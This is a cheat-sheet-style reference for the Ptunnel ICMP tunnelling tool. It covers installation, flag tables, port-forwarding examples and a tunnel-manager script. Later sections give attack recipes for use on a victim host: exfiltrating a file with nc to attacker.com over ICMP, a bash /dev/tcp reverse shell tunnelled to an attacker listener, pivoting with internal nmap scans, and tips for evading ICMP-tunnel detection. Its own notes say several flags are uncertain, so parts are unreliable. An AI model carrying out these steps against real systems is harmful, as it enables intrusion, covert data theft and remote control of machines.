
Ptunnel

Ptunnel (Ping Tunnel) is a tunneling utility that encapsulates TCP traffic within ICMP echo request/reply packets (ping). It is useful for penetration testing in restricted network environments, because it enables TCP connections through firewalls that allow ICMP but block standard TCP/UDP traffic. Ptunnel blends in with ordinary ping activity, but it is not invisible: the tunnel produces echo packets with larger, higher-entropy payloads and at a much higher rate than a normal ping, which is exactly what ICMP-tunnel detection looks for. Note also that ptunnel only authenticates sessions (with `-x`); it does not encrypt the tunneled data, so carry sensitive traffic over SSH or TLS inside the tunnel.

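# Install from repositories
sudo apt-get update
sudo apt-get install -y ptunnel

# Or build from source
# NOTE(review): confirm this repository is the fork you intend to run. The
# original 0.72 code base and the maintained ptunnel-ng fork do not accept the
# same flags (0.72 uses -lp/-da/-dp, ptunnel-ng uses -l/-r/-R), and the
# examples on this page use the latter style.
git clone https://github.com/royhills/ptunnel.git
cd ptunnel || exit 1
make clean
make

# Verify installation. -h is the help switch used throughout this page; its
# output also shows which flag names the installed version actually accepts.
ptunnel -h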
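# Get source code over TLS (the download link later on this page already uses
# https for the same host; a plain-http fetch lets an on-path attacker swap
# the tarball that is about to be built and installed as root)
wget https://www.cs.uit.no/~daniels/PingTunnel/ptunnel-0.72.tar.gz

# Nothing below verifies the archive: compare this digest with a checksum or
# signature obtained out-of-band before running `make install` as root.
sha256sum ptunnel-0.72.tar.gz

tar -xzf ptunnel-0.72.tar.gz
cd ptunnel-0.72 || exit 1

# Compile
make
sudo make install

# Verify
ptunnel -h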
# macOS: Homebrew formula (when one is available)
brew install ptunnel

# Alternatively build from the git source
git clone https://github.com/royhills/ptunnel.git
cd ptunnel
make

# Put the binary on the PATH
sudo cp -- ptunnel /usr/local/bin/
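# Download precompiled binary
# From https://www.cs.uit.no/~daniels/PingTunnel/
# Verify the download (checksum/signature from a trusted source) before running
# it: a tunnelling binary that you will run with elevated rights is an easy
# thing to trojan, and nothing here checks it.

# Extract and add to PATH
# Put it in a dedicated directory (e.g. C:\Tools\ptunnel) and add that to PATH;
# avoid copying third-party binaries into C:\Windows\System32.

# Verify installation
ptunnel -h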
CLIENT SIDE                         SERVER SIDE (Gateway)
User App ──┐                              ┌─── Target Service
           │                              │
    TCP:22 │                              │ TCP:22
           ▼                              ▼
[Ptunnel Client] ──ICMP packets──→ [Ptunnel Server] ──TCP──→ Target
           ▲                              ▲
  (Local Port 8022)           (Gateway to External Network)
| Command | Description |
| --- | --- |
| `ptunnel -p gateway.com -l 8022 -r target.com -R 22` | Client tunnel (the client also opens a raw ICMP socket, so it normally needs root/CAP_NET_RAW too) |
| `sudo ptunnel -x password` | Server with authentication |
| `ptunnel -h` | Display help information |
| `sudo ptunnel` | Start server (requires root) |
# Start the ptunnel server; root is needed because it opens a raw ICMP socket
sudo ptunnel

# The server now answers ICMP tunnelling requests.
# Nothing else has to be configured for a first test.

# Start the server with a shared password
sudo ptunnel -x mysecretpassword

# Only clients presenting the same password get a tunnel.
# -x authenticates the session; it does not encrypt the tunnelled payload.
# The password is also visible to local users in `ps` output and in your
# shell history, because it is passed on the command line.
# Bind the server to a particular local address
sudo ptunnel -s 192.168.1.50

# The same, given as a hostname
sudo ptunnel -s gateway.internal.com
# NOTE(review): -s is described on this page as the bind address; in some
# ptunnel builds -s means something else (daemonise), so confirm with
# `ptunnel -h` before relying on it.

# Verbose output while debugging
# NOTE(review): depending on the version, -v may expect a level argument
# (e.g. `-v 4`); again, check `ptunnel -h`.
sudo ptunnel -v
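# Run ptunnel in background.
# `nohup sudo ... &` hangs or fails when sudo needs to prompt for a password,
# because the backgrounded sudo has no terminal. Cache the credential first,
# then put sudo in front of nohup and keep the log in a writable location.
sudo -v
sudo nohup ptunnel -v > ptunnel.log 2>&1 &

# Or with systemd -- only if a unit exists. The distribution package does not
# necessarily ship one; if `systemctl status ptunnel` reports "not found",
# write /etc/systemd/system/ptunnel.service first.
sudo systemctl start ptunnel

# Enable on boot
sudo systemctl enable ptunnel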
| Server Flag | Description |
| --- | --- |
| `-x` | Set authentication password (authenticates the session only; the payload is not encrypted) |
| `-s` | Server/gateway IP address (as described on this page; confirm with `ptunnel -h`, since the letter has a different meaning in some builds) |
| `-v` | Verbose output (may take a level argument depending on version) |
| `-c` | Cisco compatibility mode (not documented in all versions; verify with `ptunnel -h`) |
| `-l` | Local protocol (udp, tcp) -- note this conflicts with the client table below, where `-l` is the local listen port; verify against your build's help output |
# Tunnel to a remote host via the ICMP gateway
# (the client opens a raw ICMP socket, so it normally needs root/CAP_NET_RAW)
ptunnel -p gateway.com -l 8022 -r target.server.com -R 22

# Local side: 127.0.0.1:8022
# Remote side: target.server.com:22, reached through gateway.com

# Same tunnel against a password-protected server
ptunnel -p gateway.com -x mysecretpassword -l 8022 -r target.server.com -R 22

# -x must be identical on both ends; it is visible in `ps` while running
# SSH over the tunnel (local 8022 -> target.server.com:22)
ptunnel -p gateway.com -l 8022 -r target.server.com -R 22

# Plain HTTP over the tunnel (local 8080 -> internal-web.com:80)
# Remember the tunnel itself adds no encryption; HTTP stays cleartext
ptunnel -p gateway.com -l 8080 -r internal-web.com -R 80

# Several tunnels at once: one ptunnel process per distinct local port
ptunnel -p gateway.com -l 8022 -r target1.com -R 22 &
ptunnel -p gateway.com -l 8023 -r target2.com -R 22 &
ptunnel -p gateway.com -l 8080 -r internal-web.com -R 80 &
# Pin the source address the tunnel uses (multi-homed hosts)
ptunnel -p gateway.com -s 192.168.1.100 -l 8022 -r target.server.com -R 22

# Handy when the default route would leave via the wrong interface
| Client Flag | Description |
| --- | --- |
| `-p` | Gateway/proxy server |
| `-l` | Local listen port |
| `-r` | Remote target server |
| `-R` | Remote target port |
| `-s` | Source IP address |
| `-x` | Server password (passed on the command line, so visible in `ps` and shell history) |
| `-u` | Unprivileged mode (the meaning of `-u` differs between ptunnel versions -- UDP transport vs. unprivileged mode; check `ptunnel -h`) |
| `-v` | Verbose output |
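# Terminal 1: Start server (root: raw ICMP socket)
sudo ptunnel

# Terminal 2: Create client tunnel
# (the client side also opens a raw ICMP socket and normally needs root too)
ptunnel -p 192.168.1.1 -l 8022 -r internal-server.local -R 22

# Terminal 3: SSH through tunnel
# HostKeyAlias stores the host key under the real server name instead of
# "[127.0.0.1]:8022"; without it, pointing 8022 at a different host later
# produces a host-key mismatch warning that is easy to wave through.
ssh -p 8022 -o HostKeyAlias=internal-server.local username@127.0.0.1

# Now you have SSH access to internal-server through ICMP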
# Gateway: start the server with a shared password
sudo ptunnel -x tunnel_password

# Client: one tunnel per internal service
# 8022 -> db.internal:3306, 8080 -> web.internal:80, 8443 -> web.internal:443
ptunnel -p gateway.com -x tunnel_password -l 8022 -r db.internal -R 3306 &
ptunnel -p gateway.com -x tunnel_password -l 8080 -r web.internal -R 80 &
ptunnel -p gateway.com -x tunnel_password -l 8443 -r web.internal -R 443 &

# Use the services via the local ports (127.0.0.1 forces a TCP connection)
mysql -h 127.0.0.1 -P 8022 -u user
firefox http://127.0.0.1:8080
# RDP: local 3389 -> rdp-server.internal:3389
ptunnel -p gateway.com -l 3389 -r rdp-server.internal -R 3389

# Linux RDP client
rdesktop 127.0.0.1:3389
# Windows RDP client
mstsc /v:127.0.0.1:3389
# VNC: local 5900 -> vnc-server.internal:5900
ptunnel -p gateway.com -l 5900 -r vnc-server.internal -R 5900

# Point the viewer at the local end
vncviewer 127.0.0.1:5900
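#!/usr/bin/env bash
# ptunnel_manager.sh -- bring up a set of ptunnel client tunnels through one
# gateway and tear them all down again when the script exits.
#
# Environment:
#   PTUNNEL_GATEWAY   host running the ptunnel proxy (default: gateway.com)
#   PTUNNEL_PASSWORD  shared -x password; read from the environment so the
#                     secret is not hard-coded in a file that ends up in git
#
# Limitations: ptunnel takes the password on argv, so it is still visible to
# other local users in `ps` while a tunnel is running. The ptunnel client
# opens a raw ICMP socket, so this script normally has to run as root.
set -euo pipefail

GATEWAY="${PTUNNEL_GATEWAY:-gateway.com}"
PASSWORD="${PTUNNEL_PASSWORD:?set PTUNNEL_PASSWORD to the shared -x password}"
readonly GATEWAY PASSWORD

#######################################
# Start one background tunnel and record its PID.
# Arguments: $1 name, $2 local port, $3 remote host, $4 remote port
# Outputs:   writes tunnel_<name>.pid in the current directory
#######################################
create_tunnel() {
  local name=$1 local_port=$2 remote_host=$3 remote_port=$4

  echo "[*] Creating tunnel: $name (127.0.0.1:$local_port -> $remote_host:$remote_port)"
  ptunnel -p "$GATEWAY" -x "$PASSWORD" \
    -l "$local_port" -r "$remote_host" -R "$remote_port" &
  echo "$!" > "tunnel_${name}.pid"
}

#######################################
# Stop the tunnel named $1 if its PID file exists.
# Returns: 0 whether or not a tunnel was running
#######################################
kill_tunnel() {
  local name=$1 pidfile="tunnel_${name}.pid" pid

  [[ -f "$pidfile" ]] || return 0
  pid="$(cat -- "$pidfile")"
  # TERM first; the process may already be gone, which is fine here.
  kill -- "$pid" 2>/dev/null || true
  rm -f -- "$pidfile"
  echo "[*] Tunnel $name closed"
}

#######################################
# EXIT trap: close every tunnel this script started.
#######################################
cleanup() {
  local pidfile name
  for pidfile in tunnel_*.pid; do
    [[ -e "$pidfile" ]] || continue
    name=${pidfile#tunnel_}
    kill_tunnel "${name%.pid}"
  done
}

main() {
  if [[ "${EUID:-$(id -u)}" -ne 0 ]]; then
    echo "[!] ptunnel needs a raw ICMP socket; run this as root" >&2
  fi
  trap cleanup EXIT

  create_tunnel "ssh" 8022 "internal-ssh.local" 22
  create_tunnel "mysql" 3306 "db-server.local" 3306
  create_tunnel "http" 8080 "web-server.local" 80

  echo "[*] All tunnels created"
  # Block until interrupted (or until every tunnel has exited); the EXIT
  # trap then removes the PID files and kills anything still running.
  wait
}

main "$@"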
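# Chain for lateral movement
# Attacker -> Gateway (ICMP) -> Internal Pivot -> Target

# Server at gateway
sudo ptunnel -x pass123

# Client creates tunnel to pivot (local 9999 -> 192.168.100.50:22)
ptunnel -p gateway.com -x pass123 -l 9999 -r 192.168.100.50 -R 22

# Second hop: the pivot already has direct TCP reachability to the target, so
# there is nothing to gain from running another ptunnel client against
# 127.0.0.1 on the pivot (that would need a ptunnel server on the pivot and
# would still go nowhere new). Let SSH forward the next hop instead:
# local 8022 -> (pivot) -> target.internal:22, carried inside the first tunnel.
ssh -p 9999 -o HostKeyAlias=pivot -L 8022:target.internal:22 pivot_user@127.0.0.1

# Access target through both hops (in another terminal)
ssh -p 8022 -o HostKeyAlias=target.internal target_user@127.0.0.1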
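# Watch ICMP traffic
# "echo-request"/"echo-reply" are not tcpdump filter primitives; the
# original expression is rejected by the filter compiler. Match on the type:
sudo tcpdump -ni any 'icmp[icmptype] == icmp-echo or icmp[icmptype] == icmp-echoreply'

# Monitor bandwidth usage
iftop -i eth0

# Check tunnel statistics (the local TCP legs of each tunnel)
ss -tn state established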
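# Baseline tunnel (no buffer-size option is being set here; the command is the
# plain client invocation)
ptunnel -p gateway.com -l 8022 -r target.com -R 22

# -u variant
# NOTE(review): this page describes -u both as "unprivileged mode" (flag
# tables) and as "UDP for better performance" (here); the meaning differs
# between ptunnel versions, so check `ptunnel -h` before assuming either.
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -u

# Rate limiting to look less like a tunnel
# NOTE(review): -d is not a documented option in the ptunnel versions I am
# aware of; verify with `ptunnel -h`. Kept as given on the page.
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -d 100

# Running the client in a subshell in the background does not add any delay
# between packets; real pacing has to come from the application on top of
# the tunnel (or from a tool that supports it).
(ptunnel -p gateway.com -l 8022 -r target.com -R 22) &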
# Blend with ordinary ping traffic
# A slow background ping adds a little legitimate-looking noise, but it does
# not hide the tunnel's own packets: those still carry larger payloads at a
# much higher rate, which is what ICMP-tunnel detections key on.
ping -i 60 gateway.com &

# Run the tunnel alongside it
ptunnel -p gateway.com -l 8022 -r target.com -R 22
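# Victim machine (has ICMP out, no TCP)
# Server setup at attacker gateway
sudo ptunnel -x exfil_pass

# Attacker: start the listener before data is sent
nc -lvnp 4444 > exfiltrated_data.bin

# From victim (compromised system): local 9999 -> attacker.com:4444 via ICMP
# (the client needs raw-socket privileges on the victim as well)
ptunnel -p attacker-gateway.com -x exfil_pass -l 9999 -r attacker.com -R 4444

# From victim: the tunnel only forwards what is written to the local port, so
# the data has to be pushed into it explicitly. It travels unencrypted over
# ICMP; pipe it through an encrypting tool first if that matters.
nc 127.0.0.1 9999 < data_to_exfiltrate.bin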
# Attacker: ptunnel server with a shared password
sudo ptunnel -x shell_pass

# Attacker: plain TCP listener the shell will land on
nc -lvnp 5555

# Victim: ICMP tunnel whose far end is the attacker's listener
# (local 6666 -> attacker.com:5555)
ptunnel -p attacker.com -x shell_pass -l 6666 -r attacker.com -R 5555

# Victim: interactive shell into the local end of the tunnel
# (/dev/tcp is a bash feature; it is unencrypted, like the tunnel itself)
/bin/bash -i >& /dev/tcp/127.0.0.1/6666 0>&1
# Attacker: tunnel to the pivot's SSH port (local 8022 -> pivot-point.internal:22)
ptunnel -p gateway.com -l 8022 -r pivot-point.internal -R 22

# Land on the pivot over the tunnel
ssh -p 8022 pivot@127.0.0.1

# On the pivot: enumerate the internal range
# (a service-version scan of a /24 is noisy; expect it to show up in logs)
nmap -sV 192.168.100.0/24

# Scan output comes back over the same SSH session
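# Check ICMP connectivity
ping -c 5 gateway.com

# Verify server is running
# netstat does not list raw ICMP sockets usefully; check the process instead,
# and the raw socket it holds (root needed to see the owning process).
pgrep -a ptunnel
sudo ss -nlp -A raw

# Enable verbose on both sides (-v may need a level argument; see ptunnel -h)
sudo ptunnel -v
ptunnel -p gateway.com -l 8022 -r target.com -R 22 -v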
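# Test password
# A client invocation needs the tunnel endpoints too; without -l/-r/-R there
# is nothing for the client to connect, so the original line cannot test the
# password. Run a complete tunnel verbosely and watch for the auth result.
ptunnel -p gateway.com -x test_password -l 8022 -r target.com -R 22 -v

# Ensure server and client passwords match
# Server: sudo ptunnel -x mypass
# Client: ptunnel -p gateway.com -x mypass ...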
# Latency to the gateway
ping -c 10 gateway.com

# Watch the tunnel's ICMP on the wire (numeric output, no DNS lookups)
sudo tcpdump -ni any icmp

# Packet loss over a longer sample
ping -c 100 gateway.com | grep loss
  • Authorization: Only tunnel through authorized gateways
  • Passwords: Use strong authentication passwords; they are passed on the command line, so they show up in `ps` and shell history -- prefer wrapper scripts that read them from the environment
  • Encryption: Ptunnel only authenticates the session; it does not encrypt the tunneled data. Run SSH/TLS inside the tunnel for anything sensitive
  • Privileges: Both the server and the client open raw ICMP sockets and normally need root (CAP_NET_RAW)
  • Logging: Enable verbose mode for forensic review
  • Monitoring: Monitor for ICMP-based tunnel activity
  • Network Policy: Establish clear policies on ICMP usage
  • Detection: Be aware ICMP tunneling may trigger IDS alerts (payload size, entropy and packet rate differ from normal pings)
  • Compliance: Ensure activity complies with security policy
  • Documentation: Document all tunnel operations
| Flag | Description |
| --- | --- |
| `-p` | Gateway/proxy server hostname |
| `-l` | Local listen port number |
| `-r` | Remote target server hostname |
| `-R` | Remote target port number |
| `-s` | Source IP address |
| `-x` | Authentication password (session authentication only; no payload encryption) |
| `-u` | Unprivileged mode (meaning differs between versions; verify with `ptunnel -h`) |
| `-v` | Verbose debugging output |
| `-c` | Cisco compatibility mode (not documented in all versions; verify with `ptunnel -h`) |
| `-d` | Delay between packets (not documented in all versions; verify with `ptunnel -h`) |
| `-h` | Help information |

Flag names vary between the original ptunnel 0.72 (`-lp`/`-da`/`-dp`) and the ptunnel-ng fork (`-l`/`-r`/`-R`); run `ptunnel -h` on the installed build before copying commands from this page.
  • socat — Relay and tunneling utility
  • Chisel — Fast TCP/UDP tunneling
  • stunnel — SSL/TLS tunneling proxy
  • Ligolo-ng — Advanced tunneling framework
  • SSH Tunneling — Native SSH port forwarding
  • Proxytunnel — HTTP proxy tunneling
  • WireGuard — Modern VPN alternative